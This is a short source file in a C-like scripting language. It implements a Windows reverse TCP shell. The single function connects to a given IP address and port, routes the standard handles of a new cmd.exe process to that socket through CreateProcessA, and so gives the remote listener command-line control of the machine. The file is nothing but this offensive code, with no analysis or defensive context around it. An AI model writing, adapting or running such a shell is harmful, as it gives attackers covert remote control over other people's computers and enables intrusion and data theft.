declare("CreateProcessA", "kernel32.dll");

import libraries.os.network

int fn ReverseTcpShell(int ip, int port) {
   string cmd_line = "cmd.exe";
   int socket = ConnectTcp(ip, port);
   array startup_info int[17];
   int cnt = 0;
   while(cnt < 17) {
       startup_info[cnt] = 0;
       cnt += 1;
   }
   startup_info[11] = 0x100;
   startup_info[14] = socket;
   startup_info[15] = socket;
   startup_info[16] = socket;
   array process_info int[4];
   startup_info[0] = 0x44;
   CreateProcessA(0, cmd_line, 0, 0, 1, 0, 0, 0, startup_info, process_info);
   return 1;
}